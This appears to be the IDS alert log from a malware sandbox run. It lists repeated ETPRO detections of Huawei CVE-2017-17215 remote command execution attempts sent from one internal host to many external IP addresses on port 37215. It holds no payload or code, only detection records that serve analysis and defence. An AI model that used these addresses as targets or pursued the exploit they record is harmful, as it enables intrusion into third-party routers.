                                                    07/10/24-08:26:22.214237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011437215192.168.2.1441.108.36.228
                                                    07/10/24-08:26:22.242541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5737837215192.168.2.14118.235.102.70
                                                    07/10/24-08:26:42.161907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3589037215192.168.2.14157.179.222.8
                                                    07/10/24-08:26:52.042445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572837215192.168.2.1441.250.106.172
                                                    07/10/24-08:26:14.735406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089437215192.168.2.14157.50.120.184
                                                    07/10/24-08:26:28.882577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3642637215192.168.2.1441.174.98.220
                                                    07/10/24-08:26:23.326882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384437215192.168.2.14197.124.128.230
                                                    07/10/24-08:26:25.498788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088237215192.168.2.1469.204.213.180
                                                    07/10/24-08:26:20.160921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516837215192.168.2.14157.220.213.68
                                                    07/10/24-08:27:07.356942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4504437215192.168.2.14145.87.80.137
                                                    07/10/24-08:27:19.271141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510037215192.168.2.1441.208.180.203
                                                    07/10/24-08:27:17.037647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718237215192.168.2.1441.239.210.45
                                                    07/10/24-08:26:28.763901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968237215192.168.2.1441.208.254.34
                                                    07/10/24-08:26:33.257964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092237215192.168.2.1441.187.140.67
                                                    07/10/24-08:26:41.556012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312237215192.168.2.14114.34.168.204
                                                    07/10/24-08:26:38.554861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4973837215192.168.2.1441.30.101.165
                                                    07/10/24-08:26:14.821696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5843237215192.168.2.14157.220.23.42
                                                    07/10/24-08:26:14.815907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278837215192.168.2.1441.159.153.229
                                                    07/10/24-08:26:20.100674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480237215192.168.2.14157.215.31.167
                                                    07/10/24-08:26:20.187886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697037215192.168.2.14197.3.52.146
                                                    07/10/24-08:26:20.152371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629837215192.168.2.1441.59.170.186
                                                    07/10/24-08:26:36.339944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519837215192.168.2.14197.179.142.231
                                                    07/10/24-08:27:22.936366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3547237215192.168.2.1431.137.143.181
                                                    07/10/24-08:26:59.807030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388637215192.168.2.1482.97.38.225
                                                    07/10/24-08:27:05.156857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601037215192.168.2.14157.109.124.69
                                                    07/10/24-08:26:55.426647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006837215192.168.2.14197.215.85.74
                                                    07/10/24-08:26:33.171488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789637215192.168.2.1441.117.155.126
                                                    07/10/24-08:27:07.361334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090037215192.168.2.14158.187.240.247
                                                    07/10/24-08:27:20.519262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970437215192.168.2.14149.123.226.223
                                                    07/10/24-08:26:42.353593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517037215192.168.2.1441.95.112.174
                                                    07/10/24-08:26:43.664529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550037215192.168.2.14197.237.161.29
                                                    07/10/24-08:27:10.679759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5119637215192.168.2.14197.187.106.157
                                                    07/10/24-08:26:17.956577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5161237215192.168.2.14197.0.81.243
                                                    07/10/24-08:27:02.893845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197237215192.168.2.14197.123.133.11
                                                    07/10/24-08:27:02.841622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886037215192.168.2.1424.31.69.199
                                                    07/10/24-08:27:30.511360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018037215192.168.2.1441.100.231.173
                                                    07/10/24-08:27:20.506154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521637215192.168.2.14135.249.16.41
                                                    07/10/24-08:27:10.654504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875837215192.168.2.1441.17.201.65
                                                    07/10/24-08:26:59.828801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116837215192.168.2.14197.12.217.84
                                                    07/10/24-08:26:26.483637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281437215192.168.2.14197.228.87.159
                                                    07/10/24-08:27:14.882178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677637215192.168.2.14157.245.49.216
                                                    07/10/24-08:26:11.434490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.14157.8.45.235
                                                    07/10/24-08:26:52.060126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921837215192.168.2.14197.4.96.139
                                                    07/10/24-08:27:27.063011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861837215192.168.2.14197.255.90.72
                                                    07/10/24-08:27:27.126128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826437215192.168.2.14157.140.108.240
                                                    07/10/24-08:27:03.003897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156037215192.168.2.1441.53.94.112
                                                    07/10/24-08:26:23.348137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548037215192.168.2.14197.105.20.175
                                                    07/10/24-08:26:29.861984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951037215192.168.2.1453.6.140.73
                                                    07/10/24-08:26:15.834521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396637215192.168.2.1441.74.233.186
                                                    07/10/24-08:26:23.359081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502037215192.168.2.14197.11.199.34
                                                    07/10/24-08:27:13.876848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318437215192.168.2.14203.50.192.231
                                                    07/10/24-08:27:28.054333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051037215192.168.2.14197.125.66.107
                                                    07/10/24-08:27:05.173254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560237215192.168.2.14197.182.74.74
                                                    07/10/24-08:27:31.439490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317037215192.168.2.14157.89.151.215
                                                    07/10/24-08:27:23.923569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443037215192.168.2.14113.224.7.123
                                                    07/10/24-08:26:45.663934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5933037215192.168.2.14157.7.180.194
                                                    07/10/24-08:26:53.145765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727037215192.168.2.1441.161.220.192
                                                    07/10/24-08:27:14.666917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709437215192.168.2.1441.216.47.177
                                                    07/10/24-08:27:28.115496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744837215192.168.2.14171.102.182.78
                                                    07/10/24-08:27:20.488786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397837215192.168.2.14157.166.1.63
                                                    07/10/24-08:27:33.866007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252037215192.168.2.1414.107.100.35
                                                    07/10/24-08:26:41.397697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669237215192.168.2.1485.77.227.20
                                                    07/10/24-08:26:14.735455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910837215192.168.2.1441.250.101.7
                                                    07/10/24-08:26:36.378488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570437215192.168.2.14157.62.237.153
                                                    07/10/24-08:26:38.511212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959637215192.168.2.142.244.153.180
                                                    07/10/24-08:26:41.496720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593437215192.168.2.14157.248.231.11
                                                    07/10/24-08:26:25.514524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316437215192.168.2.14197.103.152.210
                                                    07/10/24-08:26:59.790586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921437215192.168.2.1441.251.116.186
                                                    07/10/24-08:27:02.962556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4011437215192.168.2.1424.63.199.118
                                                    07/10/24-08:26:41.407237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734837215192.168.2.14157.130.190.190
                                                    07/10/24-08:27:13.983533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891237215192.168.2.1441.163.26.170
                                                    07/10/24-08:27:11.489272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053037215192.168.2.14157.141.67.176
                                                    07/10/24-08:26:25.432344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428037215192.168.2.14197.80.188.26
                                                    07/10/24-08:26:25.481088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409437215192.168.2.14197.63.110.79
                                                    07/10/24-08:27:30.426359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4546237215192.168.2.14111.2.5.6
                                                    07/10/24-08:27:05.128413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768237215192.168.2.1474.161.74.123
                                                    07/10/24-08:27:27.058736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079837215192.168.2.14197.153.237.195
                                                    07/10/24-08:26:41.430323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001237215192.168.2.14197.226.177.99
                                                    07/10/24-08:27:14.003131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692237215192.168.2.1434.63.40.144
                                                    07/10/24-08:26:31.048424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495037215192.168.2.14197.12.174.30
                                                    07/10/24-08:26:43.900860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051237215192.168.2.14149.113.158.233
                                                    07/10/24-08:27:23.938620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442637215192.168.2.14197.248.87.154
                                                    07/10/24-08:27:13.808295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894837215192.168.2.1441.21.221.235
                                                    07/10/24-08:27:07.281548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816237215192.168.2.14157.90.88.183
                                                    07/10/24-08:26:49.761554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315837215192.168.2.1457.196.252.179
                                                    07/10/24-08:26:18.024075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849437215192.168.2.14197.141.11.75
                                                    07/10/24-08:26:33.255405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901837215192.168.2.14197.127.209.123
                                                    07/10/24-08:27:20.465433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363237215192.168.2.14197.62.68.82
                                                    07/10/24-08:26:42.455188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3952237215192.168.2.1441.99.29.110
                                                    07/10/24-08:27:02.840252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900237215192.168.2.14197.143.234.119
                                                    07/10/24-08:27:24.951941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799437215192.168.2.14197.22.46.123
                                                    07/10/24-08:26:34.245550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641437215192.168.2.14197.106.26.253
                                                    07/10/24-08:27:05.199033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164437215192.168.2.1441.80.110.143
                                                    07/10/24-08:26:59.768994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5599237215192.168.2.14197.233.97.191
                                                    07/10/24-08:26:11.572202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306637215192.168.2.1441.50.45.78
                                                    07/10/24-08:27:23.873302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295637215192.168.2.1447.148.158.1
                                                    07/10/24-08:26:14.624834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340637215192.168.2.14157.32.119.0
                                                    07/10/24-08:26:33.207686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304037215192.168.2.14197.160.173.101
                                                    07/10/24-08:26:41.330955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812637215192.168.2.1441.142.186.154
                                                    07/10/24-08:26:22.290306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321837215192.168.2.14157.243.148.62
                                                    07/10/24-08:26:41.381541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330437215192.168.2.14210.137.76.20
                                                    07/10/24-08:26:15.882242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4640637215192.168.2.14197.98.73.175
                                                    07/10/24-08:27:14.672861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805437215192.168.2.1441.191.178.248
                                                    07/10/24-08:26:43.826364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692237215192.168.2.14197.68.244.95
                                                    07/10/24-08:26:34.230716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296037215192.168.2.1441.84.124.149
                                                    07/10/24-08:27:33.828822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4646837215192.168.2.1441.138.173.184
                                                    07/10/24-08:26:22.281156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562437215192.168.2.1441.0.16.90
                                                    07/10/24-08:26:22.283618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230637215192.168.2.14157.228.98.102
                                                    07/10/24-08:26:47.867621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838637215192.168.2.14157.62.194.194
                                                    07/10/24-08:27:32.491395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654837215192.168.2.14192.55.170.195
                                                    07/10/24-08:26:18.019477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234637215192.168.2.14197.21.197.157
                                                    07/10/24-08:26:57.662130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5075237215192.168.2.14157.73.199.14
                                                    07/10/24-08:27:28.156575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424237215192.168.2.14157.67.200.149
                                                    07/10/24-08:26:41.281691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939837215192.168.2.14197.200.60.140
                                                    07/10/24-08:27:14.844780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351837215192.168.2.1441.252.194.226
                                                    07/10/24-08:26:23.341408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256837215192.168.2.14197.155.254.254
                                                    07/10/24-08:27:22.452806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227237215192.168.2.1441.216.221.79
                                                    07/10/24-08:27:14.853963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708437215192.168.2.14197.183.238.195
                                                    07/10/24-08:26:34.207710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671837215192.168.2.1491.64.238.63
                                                    07/10/24-08:27:10.617343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753237215192.168.2.1441.28.198.61
                                                    07/10/24-08:27:32.599203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415237215192.168.2.14197.220.191.223
                                                    07/10/24-08:26:43.879601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798237215192.168.2.1441.211.78.199
                                                    07/10/24-08:26:13.668084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058637215192.168.2.14222.117.171.170
                                                    07/10/24-08:27:24.941876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677237215192.168.2.14157.158.187.224
                                                    07/10/24-08:26:31.102240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4171037215192.168.2.14197.63.77.34
                                                    07/10/24-08:27:23.853234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919037215192.168.2.14197.160.238.83
                                                    07/10/24-08:26:26.441172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426437215192.168.2.14157.57.139.119
                                                    07/10/24-08:26:29.877768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128037215192.168.2.1441.201.22.63
                                                    07/10/24-08:27:05.188794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772637215192.168.2.14197.73.121.14
                                                    07/10/24-08:26:45.651958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753837215192.168.2.14157.68.188.177
                                                    07/10/24-08:26:51.964382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732637215192.168.2.1441.221.143.161
                                                    07/10/24-08:26:53.230635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782637215192.168.2.14197.68.164.74
                                                    07/10/24-08:26:28.736673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450237215192.168.2.14157.212.132.237
                                                    07/10/24-08:27:17.040867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106037215192.168.2.14197.192.149.121
                                                    07/10/24-08:26:13.852181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457637215192.168.2.1441.179.208.111
                                                    07/10/24-08:26:36.366891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218037215192.168.2.14197.202.241.54
                                                    07/10/24-08:26:17.950473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300837215192.168.2.14157.25.219.123
                                                    07/10/24-08:27:13.850928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951437215192.168.2.1441.115.64.91
                                                    07/10/24-08:27:28.169904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382437215192.168.2.14157.173.234.16
                                                    07/10/24-08:27:20.494358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613237215192.168.2.14197.219.104.221
                                                    07/10/24-08:27:33.834313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442637215192.168.2.14197.64.65.51
                                                    07/10/24-08:26:47.929335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3307637215192.168.2.14169.131.171.52
                                                    07/10/24-08:27:05.173254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676437215192.168.2.14197.227.231.53
                                                    07/10/24-08:27:11.551346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947437215192.168.2.14197.143.27.110
                                                    07/10/24-08:27:19.311200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857437215192.168.2.14197.171.7.226
                                                    07/10/24-08:26:11.587668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327837215192.168.2.14197.180.89.15
                                                    07/10/24-08:27:27.074903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644637215192.168.2.14157.235.49.150
                                                    07/10/24-08:26:36.389134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227837215192.168.2.14197.40.21.159
                                                    07/10/24-08:26:13.778157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170237215192.168.2.1441.87.240.138
                                                    07/10/24-08:26:28.732264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727037215192.168.2.1441.181.168.143
                                                    07/10/24-08:26:22.291888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738437215192.168.2.14103.112.207.125
                                                    07/10/24-08:27:23.873809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200037215192.168.2.1441.192.112.34
                                                    07/10/24-08:26:59.611228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951437215192.168.2.14197.227.107.13
                                                    07/10/24-08:27:32.610911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130037215192.168.2.14197.106.23.180
                                                    07/10/24-08:27:33.803873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681837215192.168.2.14197.160.183.156
                                                    07/10/24-08:27:10.629706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860837215192.168.2.14157.111.151.192
                                                    07/10/24-08:27:32.594360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009237215192.168.2.14157.25.118.161
                                                    07/10/24-08:26:36.403967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684837215192.168.2.14204.177.182.207
                                                    07/10/24-08:27:17.062116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797237215192.168.2.14157.249.150.228
                                                    07/10/24-08:27:23.920658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457837215192.168.2.14197.29.181.166
                                                    07/10/24-08:26:36.387027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079837215192.168.2.14197.81.68.59
                                                    07/10/24-08:27:11.525645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6009437215192.168.2.14197.150.9.12
                                                    07/10/24-08:27:19.298616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674237215192.168.2.1486.37.82.196
                                                    07/10/24-08:27:24.954167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600037215192.168.2.14180.232.66.107
                                                    07/10/24-08:27:30.532639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759437215192.168.2.14157.25.48.124
                                                    07/10/24-08:27:32.609585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001837215192.168.2.1441.208.184.86
                                                    07/10/24-08:26:59.533067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815037215192.168.2.1441.207.86.156
                                                    07/10/24-08:26:38.624887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804437215192.168.2.1413.117.80.167
                                                    07/10/24-08:26:43.663185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034837215192.168.2.14157.207.33.82
                                                    07/10/24-08:26:22.219271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167037215192.168.2.14140.75.80.132
                                                    07/10/24-08:26:41.392423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997837215192.168.2.14157.138.13.220
                                                    07/10/24-08:27:17.043908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951637215192.168.2.1441.104.26.75
                                                    07/10/24-08:26:15.845441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631637215192.168.2.14197.67.249.49
                                                    07/10/24-08:26:41.410594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3305637215192.168.2.14157.155.142.161
                                                    07/10/24-08:27:08.451424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262837215192.168.2.1497.64.250.155
                                                    07/10/24-08:27:07.353904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990637215192.168.2.14157.198.104.57
                                                    07/10/24-08:27:17.067488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255837215192.168.2.14197.159.195.216
                                                    07/10/24-08:27:08.423540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708637215192.168.2.14197.168.39.76
                                                    07/10/24-08:27:13.998710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148037215192.168.2.14197.148.80.235
                                                    07/10/24-08:27:19.264327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5444837215192.168.2.1441.69.181.119
                                                    07/10/24-08:26:36.349242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215037215192.168.2.14157.82.196.230
                                                    07/10/24-08:26:59.613814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806437215192.168.2.14157.59.236.126
                                                    07/10/24-08:26:55.470817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931237215192.168.2.1441.166.128.199
                                                    07/10/24-08:27:30.538125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524637215192.168.2.1441.232.27.144
                                                    07/10/24-08:27:24.962924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234837215192.168.2.14221.173.102.240
                                                    07/10/24-08:27:24.993210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5692237215192.168.2.1497.11.234.128
